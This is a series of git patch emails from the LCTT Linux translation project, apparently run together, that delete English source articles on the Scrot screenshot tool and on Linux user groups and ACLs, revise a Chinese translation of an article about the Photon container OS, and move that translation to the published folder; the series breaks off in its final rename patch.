=?UTF-8?q?=E7=A7=BB=E9=99=A4=E9=87=8D=E5=A4=8D?= =?UTF-8?q?=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @oska874 --- ...x command-line screen grabs made simple.md | 108 ------------------ 1 file changed, 108 deletions(-) delete mode 100644 sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md diff --git a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md b/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md deleted file mode 100644 index 2b4d2248b2..0000000000 --- a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md +++ /dev/null @@ -1,108 +0,0 @@ -Scrot: Linux command-line screen grabs made simple -============================================================ - -### Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. - -![Scrot: Screen grabs made simple](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A "Scrot: Screen grabs made simple") -Image credits : Original photo by Rikki Endsley. [CC BY-SA 4.0][13] - -There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][14] and [Shutter][15]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? - -Turn to the command line and a little utility called [Scrot][16]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. - -### Getting started with Scrot - -More Linux resources - -* [What is Linux?][1] - -* [What are Linux containers?][2] - -* [Download Now: Linux commands cheat sheet][3] - -* [Advanced Linux commands cheat sheet][4] - -* [Our latest Linux articles][5] - -Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][22]. - -To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) - -Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. - -### Taking a screen capture of a single window - -Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. - -The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. - -To grab another window on your desktop, type `scrot -s [filename]`. - -The `-s` option lets you do one of two things: - -* select an open window, or - -* draw a rectangle around a window or a portion of a window to capture it. - -You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. - -The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. - -### More useful options - -Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: - -* `-b` also grabs the window's border - -* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. - -* `-c` creates a countdown in your terminal when you use the `-d` option. - -To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][17]. Then start snapping images of your screen. - -It's basic, but Scrot gets the job done nicely. - -### Topics - - [Linux][23] - -### About the author - - [![That idiot Scott Nesbitt ...](https://opensource.com/sites/default/files/styles/profile_pictures/public/scottn-cropped.jpg?itok=q4T2J4Ai)][18] - - Scott Nesbitt - I'm a long-time user of free/open source software, and write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web: [Twitter][7], [Mastodon][8], [GitHub][9], and... [more about Scott Nesbitt][10][More about me][11] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot - -作者:[ Scott Nesbitt  ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/scottnesbitt -[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot?rate=H43kUdawjR0GV9D0dCbpnmOWcqw1WekfrAI_qKo8UwI -[7]:http://www.twitter.com/ScottWNesbitt -[8]:https://mastodon.social/@scottnesbitt -[9]:https://github.com/ScottWNesbitt -[10]:https://opensource.com/users/scottnesbitt -[11]:https://opensource.com/users/scottnesbitt -[12]:https://opensource.com/user/14925/feed -[13]:https://creativecommons.org/licenses/by-sa/4.0/ -[14]:https://www.kde.org/applications/graphics/ksnapshot/ -[15]:https://launchpad.net/shutter -[16]:https://github.com/dreamer/scrot -[17]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html -[18]:https://opensource.com/users/scottnesbitt -[19]:https://opensource.com/users/scottnesbitt -[20]:https://opensource.com/users/scottnesbitt -[21]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot#comments -[22]:https://github.com/dreamer/scrot -[23]:https://opensource.com/tags/linux From 1e5d60f56f5695b538bc5c8d0448a69b6cf0db57 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 4 Dec 2017 22:33:42 +0800 Subject: [PATCH 0249/1627] Delete 20171201 How to Manage Users with Groups in Linux.md --- ...ow to Manage Users with Groups in Linux.md | 168 ------------------ 1 file changed, 168 deletions(-) delete mode 100644 sources/tech/20171201 How to Manage Users with Groups in Linux.md diff --git a/sources/tech/20171201 How to Manage Users with Groups in Linux.md b/sources/tech/20171201 How to Manage Users with Groups in Linux.md deleted file mode 100644 index 35350c819f..0000000000 --- a/sources/tech/20171201 How to Manage Users with Groups in Linux.md +++ /dev/null @@ -1,168 +0,0 @@ -translating---imquanquan - -How to Manage Users with Groups in Linux -============================================================ - -### [group-of-people-1645356_1920.jpg][1] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) - -Learn how to work with users, via groups and access control lists in this tutorial. - -[Creative Commons Zero][4] - -Pixabay - -When you administer a Linux machine that houses multiple users, there might be times when you need to take more control over those users than the basic user tools offer. This idea comes to the fore especially when you need to manage permissions for certain users. Say, for example, you have a directory that needs to be accessed with read/write permissions by one group of users and only read permissions for another group. With Linux, this is entirely possible. To make this happen, however, you must first understand how to work with users, via groups and access control lists (ACLs). - -We’ll start from the beginning with users and work our way to the more complex ACLs. Everything you need to make this happen will be included in your Linux distribution of choice. We won’t touch on the basics of users, as the focus on this article is about groups. - -For the purpose of this piece, I’m going to assume the following: - -You need to create two users with usernames: - -* olivia - -* nathan - -You need to create two groups: - -* readers - -* editors - -Olivia needs to be a member of the group editors, while nathan needs to be a member of the group readers. The group readers needs to only have read permission to the directory /DATA, whereas the group editors needs to have both read and write permission to the /DATA directory. This, of course, is very minimal, but it will give you the basic information you need to expand the tasks to fit your much larger needs. - -I’ll be demonstrating on the Ubuntu 16.04 Server platform. The commands will be universal—the only difference would be if your distribution of choice doesn’t make use of sudo. If this is the case, you’ll have to first su to the root user to issue the commands that require sudo in the demonstrations. - -### Creating the users - -The first thing we need to do is create the two users for our experiment. User creation is handled with the useradd command. Instead of just simply creating the users we need to create them both with their own home directories and then give them passwords. - -The first thing we do is create the users. To do this, issue the commands: - -``` -sudo useradd -m olivia - -sudo useradd -m nathan -``` - -Next each user must have a password. To add passwords into the mix, you’d issue the following commands: - -``` -sudo passwd olivia - -sudo passwd nathan -``` - -That’s it, your users are created. - -### Creating groups and adding users - -Now we’re going to create the groups readers and editors and then add users to them. The commands to create our groups are: - -``` -addgroup readers - -addgroup editors -``` - -### [groups_1.jpg][2] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) - -Figure 1: Our new groups ready to be used. - -[Used with permission][5] - -With our groups created, we need to add our users. We’ll add user nathan to group readers with the command: - -``` -sudo usermod -a -G readers nathan -``` - -``` -sudo usermod -a -G editors olivia -``` - -### Giving groups permissions to directories - -Let’s say you have the directory /READERS and you need to allow all members of the readers group access to that directory. First, change the group of the folder with the command: - -``` -sudo chown -R :readers /READERS -``` - -``` -sudo chmod -R g-w /READERS -``` - -``` -sudo chmod -R o-x /READERS -``` - -Let’s say you have the directory /EDITORS and you need to give members of the editors group read and write permission to its contents. To do that, the following command would be necessary: - -``` -sudo chown -R :editors /EDITORS - -sudo chmod -R g+w /EDITORS - -sudo chmod -R o-x /EDITORS -``` - -The problem with using this method is you can only add one group to a directory at a time. This is where access control lists come in handy. - -### Using access control lists - -Now, let’s get tricky. Say you have a single folder—/DATA—and you want to give members of the readers group read permission and members of the group editors read/write permissions. To do that, you must take advantage of the setfacl command. The setfacl command sets file access control lists for files and folders. - -The structure of this command looks like this: - -``` -setfacl OPTION X:NAME:Y /DIRECTORY -``` - -``` -sudo setfacl -m g:readers:rx -R /DATA -``` - -To give members of the editors group read/write permissions (while retaining read permissions for the readers group), we’d issue the command; - -``` -sudo setfacl -m g:editors:rwx -R /DATA -``` - -### All the control you need - -And there you have it. You can now add members to groups and control those groups’ access to various directories with all the power and flexibility you need. To read more about the above tools, issue the commands: - -* man usradd - -* man addgroup - -* man usermod - -* man sefacl - -* man chown - -* man chmod - -Learn more about Linux through the free ["Introduction to Linux" ][3]course from The Linux Foundation and edX. - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux - -作者:[Jack Wallen ] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.linux.com/files/images/group-people-16453561920jpg -[2]:https://www.linux.com/files/images/groups1jpg -[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[4]:https://www.linux.com/licenses/category/creative-commons-zero -[5]:https://www.linux.com/licenses/category/used-permission From 18ae29fedefe613992f4c3c98b15fb6a4c7a121c Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:38:01 +0800 Subject: [PATCH 0250/1627] PRF:20171124 Photon Could Be Your New Favorite Container OS.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @KeyLD 恭喜你,完成了第一篇翻译! 不过,按照流程,翻译前应该发起申请的 PR,翻译完提交时,要将原文删除。 --- ...Could Be Your New Favorite Container OS.md | 146 ------------------ ...Could Be Your New Favorite Container OS.md | 77 ++++----- 2 files changed, 32 insertions(+), 191 deletions(-) delete mode 100644 sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md deleted file mode 100644 index d282ef5445..0000000000 --- a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ /dev/null @@ -1,146 +0,0 @@ -Photon Could Be Your New Favorite Container OS -============================================================ - -![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") -Jack Wallen says Photon OS is an outstanding platform, geared specifically for containers.[Creative Commons Zero][5]Pixabay - -Containers are all the rage, and with good reason. [As discussed previously][13], containers allow you to quickly and easily deploy new services and applications onto your network, without requiring too much in the way of added system resources. Containers are more cost-effective than using dedicated hardware or virtual machines, and they’re easier to update and reuse. - -Best of all, containers love Linux (and vice versa). Without much trouble or time, you can get a Linux server up and running with [Docker][14] and deploying containers. But, which Linux distribution is best suited for the deployment of your containers? There are a _lot_  of options. You could go with a standard Ubuntu Server platform (which makes installing Docker and deploying containers incredibly easy), or you could opt for a lighter weight distribution — one geared specifically for the purpose of deploying containers. - -One such distribution is [Photon][15]. This particular platform was created in 2005 by [VMware][16]; it includes the Docker daemon and works with container frameworks, such as Mesos and Kubernetes. Photon is optimized to work with [VMware vSphere][17], but it can be used on bare metal, [Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], or [VirtualBox][21]. - -Photon manages to stay slim by only installing what is absolutely necessary to run the Docker daemon. In the end, the distribution comes in around 300 MB. This is just enough Linux make it all work. The key features to Photon are: - -* Kernel tuned for performance. - -* Kernel is hardened according to the [Kernel Self-Protection Project][6] (KSPP). - -* All installed packages are built with hardened security flags. - -* Operating system boots with validated trust. - -* Photon management daemon manages firewall, network, packages, and users on remote Photon OS machines. - -* Support for persistent volumes. - -* [Project Lightwave][7] integration. - -* Timely security patches and updates. - -Photon can be used via [ISO][22], [OVA][23], [Amazon Machine Image][24], [Google Compute Engine image][25], and [Azure VHD][26]. I’ll show you how to install Photon on VirtualBox, using an ISO image. The installation takes about five minutes and, in the end, you’ll have a virtual machine, ready to deploy containers. - -### Creating the virtual machine - -Before you deploy that first container, you have to create the virtual machine and install Photon. To do this, open up VirtualBox and click the New button. Walk through the Create Virtual Machine wizard (giving Photon the necessary resources, based on the usage you predict the container server will need). Once you’ve created the virtual machine, you need to first make a change to the settings. Select the newly created virtual machine (in the left pane of the VirtualBox main window) and then click Settings. In the resulting window, click on Network (from the left navigation). - -In the Networking window (Figure 1), you need to change the Attached to drop-down to Bridged Adapter. This will ensure your Photon server is reachable from your network. Once you’ve made that change, click OK. - -### [photon_0.jpg][8] - -![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change settings") -Figure 1: Changing the VirtualBox network settings for Photon.[Used with permission][1] - -Select your Photon virtual machine from the left navigation and then click Start. You will be prompted to locate and attach the IOS image. Once you’ve done that, Photon will boot up and prompt you to hit Enter to begin the installation. The installation is ncurses based (there is no GUI), but it’s incredibly simple. - -In the next screen (Figure 2), you will be asked if you want to do a Minimal, Full, or OSTree Server. I opted to go the Full route. Select whichever option you require and hit enter. - -### [photon_1.jpg][9] - -![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") -Figure 2: Selecting your installation type.[Used with permission][2] - -In the next window, select the disk that will house Photon. Since we’re installing this as a virtual machine, there will be only one disk listed (Figure 3). Tab down to Auto and hit Enter on your keyboard. The installation will then require you to type (and verify) an administrator password. Once you’ve done that, the installation will begin and finish in less than five minutes. - -### [photon_2.jpg][10] - -![Photon ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") -Figure 3: Selecting your hard disk for the Photon installation.[Used with permission][3] - -Once the installation completes, reboot the virtual machine and log in with the username root and the password you created during installation. You are ready to start working. - -Before you begin using Docker on Photon, you’ll want to upgrade the platform. Photon uses the _yum_ package manager, so login as root and issue the command  _yum update_ .If there are any updates available, you’ll be asked to okay the process (Figure 4). - -### [photon_3.jpg][11] - -![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") -Figure 4: Updating Photon.[Used with permission][4] - -Usage - -As I mentioned, Photon comes with everything you need to deploy containers or even create a Kubernetes cluster. However, out of the box, there are a few things you’ll need to do. The first thing is to enable the Docker daemon to run at start. To do this, issue the commands: - -``` -systemctl start docker - -systemctl enable docker -``` - -Now we need to create a standard user, so we’re not running the docker command as root. To do this, issue the following commands: - -``` -useradd -m USERNAME - -passwd USERNAME -``` - -Where USERNAME is the name of the user to add. - -Next we need to add the new user to the  _docker_ group with the command: - -``` -usermod -a -G docker USERNAME -``` - -Where USERNAME is the name of the user just created. - -Log out as the root user and log back in as the newly created user. You can now work with the  _docker _ command without having to make use of  _sudo_  or switching to the root user. Pull down an image from Docker Hub and start deploying containers. - -### An outstanding container platform - -Photon is, without a doubt, an outstanding platform, geared specifically for containers. Do note that Photon is an open source project, so there is no paid support to be had. If you find yourself having trouble with Photon, hop on over to the [Issues tab in the Photon Project’s Github page][27], where you can read and post about issues. And if you’re interested in forking Photon, you’ll find the source code on the project’s [official Github page][28]. - -Give Photon a try and see if it doesn’t make deploying Docker containers and/or Kubernetes clusters significantly easier. - - _Learn more about Linux through the free ["Introduction to Linux" ][29]course from The Linux Foundation and edX._ - --------------------------------------------------------------------------------- - -via: 网址 - -作者:[ JACK WALLEN][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/jlwallen -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/used-permission -[4]:https://www.linux.com/licenses/category/used-permission -[5]:https://www.linux.com/licenses/category/creative-commons-zero -[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project -[7]:http://vmware.github.io/lightwave/ -[8]:https://www.linux.com/files/images/photon0jpg -[9]:https://www.linux.com/files/images/photon1jpg -[10]:https://www.linux.com/files/images/photon2jpg -[11]:https://www.linux.com/files/images/photon3jpg -[12]:https://www.linux.com/files/images/photon-linuxjpg -[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux -[14]:https://www.docker.com/ -[15]:https://vmware.github.io/photon/ -[16]:https://www.vmware.com/ -[17]:https://www.vmware.com/products/vsphere.html -[18]:https://azure.microsoft.com/ -[19]:https://cloud.google.com/compute/ -[20]:https://aws.amazon.com/ec2/ -[21]:https://www.virtualbox.org/ -[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[27]:https://github.com/vmware/photon/issues -[28]:https://github.com/vmware/photon -[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md index e51c580da9..3496f22f4a 100644 --- a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -1,109 +1,96 @@ -Photon也许能成为你最喜爱的容器操作系统 +Photon 也许能成为你最喜爱的容器操作系统 ============================================================ ![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") -Phonton OS专注于容器,是一个非常出色的平台。 —— Jack Wallen +>Phonton OS 专注于容器,是一个非常出色的平台。 —— Jack Wallen 容器在当下的火热,并不是没有原因的。正如[之前][13]讨论的,容器可以使您轻松快捷地将新的服务与应用部署到您的网络上,而且并不耗费太多的系统资源。比起专用硬件和虚拟机,容器都是更加划算的,除此之外,他们更容易更新与重用。 -更重要的是,容器喜欢Linux(反之亦然)。不需要太多时间和麻烦,你就可以启动一台Linux服务器,运行[Docker][14],再是部署容器。但是,哪种Linux发行版最适合部署容器呢?我们的选择很多。你可以使用标准的Ubuntu服务器平台(更容易安装Docker并部署容器)或者是更轻量级的发行版 —— 专门用于部署容器。 +更重要的是,容器喜欢 Linux(反之亦然)。不需要太多时间和麻烦,你就可以启动一台 Linux 服务器,运行[Docker][14],然后部署容器。但是,哪种 Linux 发行版最适合部署容器呢?我们的选择很多。你可以使用标准的 Ubuntu 服务器平台(更容易安装 Docker 并部署容器)或者是更轻量级的发行版 —— 专门用于部署容器。 -[Photon][15]就是这样的一个发行版。这个特殊的版本是由[VMware][16]于2005年创建的,它包含了Docker的守护进程,并与容器框架(如Mesos和Kubernetes)一起使用。Photon经过优化可与[VMware vSphere][17]协同工作,而且可用于裸机,[Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], 或者 [VirtualBox][21]等。 +[Photon][15] 就是这样的一个发行版。这个特殊的版本是由 [VMware][16] 于 2005 年创建的,它包含了 Docker 的守护进程,并可与容器框架(如 Mesos 和 Kubernetes )一起使用。Photon 经过优化可与 [VMware vSphere][17] 协同工作,而且可用于裸机、[Microsoft Azure][18]、 [Google Compute Engine][19]、 [Amazon Elastic Compute Cloud][20] 或者 [VirtualBox][21] 等。 -Photon通过只安装Docker守护进程所必需的东西来保持它的轻量。而这样做的结果是,这个发行版的大小大约只有300MB。但这足以让Linux的运行一切正常。除此之外,Photon的主要特点还有: - -* 内核调整为性能模式。 - -* 内核根据[内核自防护项目][6](KSPP)进行了加固。 +Photon 通过只安装 Docker 守护进程所必需的东西来保持它的轻量。而这样做的结果是,这个发行版的大小大约只有 300MB。但这足以让 Linux 的运行一切正常。除此之外,Photon 的主要特点还有: +* 内核为性能而调整。 +* 内核根据[内核自防护项目][6](KSPP)进行了加固。 * 所有安装的软件包都根据加固的安全标识来构建。 - * 操作系统在信任验证后启动。 - -* Photon管理进程管理防火墙,网络,软件包,和远程登录在Photon机子上的用户。 - +* Photon 的管理进程可以管理防火墙、网络、软件包,和远程登录在 Photon 机器上的用户。 * 支持持久卷。 - * [Project Lightwave][7] 整合。 - * 及时的安全补丁与更新。 -Photon可以通过[ISO][22],[OVA][23],[Amazon Machine Image][24],[Google Compute Engine image][25]和[Azure VHD][26]安装使用。现在我将向您展示如何使用ISO镜像在VirtualBox上安装Photon。整个安装过程大概需要五分钟,在最后您将有一台随时可以部署容器的虚拟机。 +Photon 可以通过 [ISO 镜像][22]、[OVA][23]、[Amazon Machine Image][24]、[Google Compute Engine 镜像][25] 和 [Azure VHD][26] 安装使用。现在我将向您展示如何使用 ISO 镜像在 VirtualBox 上安装 Photon。整个安装过程大概需要五分钟,在最后您将有一台随时可以部署容器的虚拟机。 ### 创建虚拟机 -在部署第一台容器之前,您必须先创建一台虚拟机并安装Photon。为此,打开VirtualBox并点击“新建”按钮。跟着创建虚拟机向导进行配置(根据您的容器将需要的用途,为Photon提供必要的资源)。在创建好虚拟机后,您所需要做的第一件事就是更改配置。选择新建的虚拟机(在VirtualBox主窗口的左侧面板中),然后单击“设置”。在弹出的窗口中,点击“网络”(在左侧的导航中)。 +在部署第一台容器之前,您必须先创建一台虚拟机并安装 Photon。为此,打开 VirtualBox 并点击“新建”按钮。跟着创建虚拟机向导进行配置(根据您的容器将需要的用途,为 Photon 提供必要的资源)。在创建好虚拟机后,您所需要做的第一件事就是更改配置。选择新建的虚拟机(在 VirtualBox 主窗口的左侧面板中),然后单击“设置”。在弹出的窗口中,点击“网络”(在左侧的导航中)。 -在“网络”窗口(图1)中,你需要在“连接”的下拉窗口中选择桥接。这可以确保您的Photon服务与您的网络相连。完成更改后,单击确定。 - -### [photon_0.jpg][8] +在“网络”窗口(图1)中,你需要在“连接”的下拉窗口中选择桥接。这可以确保您的 Photon 服务与您的网络相连。完成更改后,单击确定。 ![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change setatings") -图 1: 更改Photon在VirtualBox中的网络设置。[经许可使用][1] -从左侧的导航选择您的Photon虚拟机,点击启动。系统会提示您去加载IOS镜像。当您完成之后,Photon安装程序将会启动并提示您按回车后开始安装。安装过程基于ncurses(没有GUI),但它非常简单。 +*图 1: 更改 Photon 在 VirtualBox 中的网络设置。[经许可使用][1]* -接下来(图2),系统会询问您是要最小化安装,完整安装还是安装OSTree服务器。我选择了完整安装。选择您所需要的任意选项,然后按回车继续。 +从左侧的导航选择您的 Photon 虚拟机,点击启动。系统会提示您去加载 ISO 镜像。当您完成之后,Photon 安装程序将会启动并提示您按回车后开始安装。安装过程基于 ncurses(没有 GUI),但它非常简单。 -### [photon_1.jpg][9] +接下来(图2),系统会询问您是要最小化安装,完整安装还是安装 OSTree 服务器。我选择了完整安装。选择您所需要的任意选项,然后按回车继续。 ![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") -图 2: 选择您的安装类型.[经许可使用][2] -在下一个窗口,选择您要安装Photon的磁盘。由于我们将其安装在虚拟机,因此只有一块磁盘会被列出(图3)。选择“自动”按下回车。然后安装程序会让您输入(并验证)管理员密码。在这之后镜像开始安装在您的磁盘上并在不到5分钟的时间内结束。 +*图 2: 选择您的安装类型。[经许可使用][2]* -### [photon_2.jpg][] +在下一个窗口,选择您要安装 Photon 的磁盘。由于我们将其安装在虚拟机,因此只有一块磁盘会被列出(图3)。选择“自动”按下回车。然后安装程序会让您输入(并验证)管理员密码。在这之后镜像开始安装在您的磁盘上并在不到 5 分钟的时间内结束。 ![Photon](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") -图 3: 选择安装Photon的硬盘.[经许可使用][3] -安装完成后,重启虚拟机并使用安装时创建的用户root和它的密码登录。一切就绪,你准备好开始工作了。 +*图 3: 选择安装 Photon 的硬盘。[经许可使用][3]* -在开始使用Docker之前,您需要更新一下Photon。Photon使用 _yum_ 软件包管理器,因此在以root用户登录后输入命令 _yum update_。如果有任何可用更新,则会询问您是否确认(图4)。 +安装完成后,重启虚拟机并使用安装时创建的用户 root 和它的密码登录。一切就绪,你准备好开始工作了。 -### [photon_3.jpg][11] +在开始使用 Docker 之前,您需要更新一下 Photon。Photon 使用 `yum` 软件包管理器,因此在以 root 用户登录后输入命令 `yum update`。如果有任何可用更新,则会询问您是否确认(图4)。 ![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") -图 4: 更新 Photon.[经许可使用][4] -用法 +*图 4: 更新 Photon。[经许可使用][4]* -正如我所说的,Photon提供了部署容器甚至创建Kubernetes集群所需要的所有包。但是,在使用之前还要做一些事情。首先要启动Docker守护进程。为此,执行以下命令: +### 用法 + +正如我所说的,Photon 提供了部署容器甚至创建 Kubernetes 集群所需要的所有包。但是,在使用之前还要做一些事情。首先要启动 Docker 守护进程。为此,执行以下命令: ``` systemctl start docker - systemctl enable docker ``` -现在我们需要创建一个标准用户,因此我们没有以root去运行docker命令。为此,执行以下命令: +现在我们需要创建一个标准用户,以便我们可以不用 root 去运行 `docker` 命令。为此,执行以下命令: ``` useradd -m USERNAME - passwd USERNAME ``` -其中USERNAME是我们新增的用户的名称。 +其中 “USERNAME” 是我们新增的用户的名称。 -接下来,我们需要将这个新用户添加到 _docker_ 组,执行命令: +接下来,我们需要将这个新用户添加到 “docker” 组,执行命令: ``` usermod -a -G docker USERNAME ``` -其中USERNAME是刚刚创建的用户的名称。 +其中 “USERNAME” 是刚刚创建的用户的名称。 -注销root用户并切换为新增的用户。现在,您已经可以不必使用 _sudo_ 命令或者是切换到root用户来使用 _docker_命令了。从Docker Hub中取出一个镜像开始部署容器吧。 +注销 root 用户并切换为新增的用户。现在,您已经可以不必使用 `sudo` 命令或者切换到 root 用户来使用 `docker` 命令了。从 Docker Hub 中取出一个镜像开始部署容器吧。 ### 一个优秀的容器平台 -在专注于容器方面,Photon毫无疑问是一个出色的平台。请注意,Photon是一个开源项目,因此没有任何付费支持。如果您对Photon有任何的问题,请移步Photon项目的Github下的[Issues][27],那里可以供您阅读相关问题,或者提交您的问题。如果您对Photon感兴趣,您也可以在项目的官方[Github][28]中找到源码。 +在专注于容器方面,Photon 毫无疑问是一个出色的平台。请注意,Photon 是一个开源项目,因此没有任何付费支持。如果您对 Photon 有任何的问题,请移步 Photon 项目的 GitHub 下的 [Issues][27],那里可以供您阅读相关问题,或者提交您的问题。如果您对 Photon 感兴趣,您也可以在该项目的官方 [GitHub][28]中找到源码。 -尝试一下Photon吧,看看它是否能够使得Docker容器和Kubernetes集群的部署更加容易。 +尝试一下 Photon 吧,看看它是否能够使得 Docker 容器和 Kubernetes 集群的部署更加容易。 -欲了解Linux的更多信息,可以通过学习Linux基金会和edX的免费课程,[“Linux 入门”][29]。 +欲了解 Linux 的更多信息,可以通过学习 Linux 基金会和 edX 的免费课程,[“Linux 入门”][29]。 -------------------------------------------------------------------------------- @@ -111,7 +98,7 @@ via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new 作者:[JACK WALLEN][a] 译者:[KeyLD](https://github.com/KeyLd) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From d533874817e9245d849b7a7d4d2c91eadb2c62c6 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:38:59 +0800 Subject: [PATCH 0251/1627] PUB:20171124 Photon Could Be Your New Favorite Container OS.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @KeyLD 文章的发布地址:https://linux.cn/article-9110-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/KeyLD --- .../20171124 Photon Could Be Your New Favorite Container OS.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171124 Photon Could Be Your New Favorite Container OS.md (100%) diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/published/20171124 Photon Could Be Your New 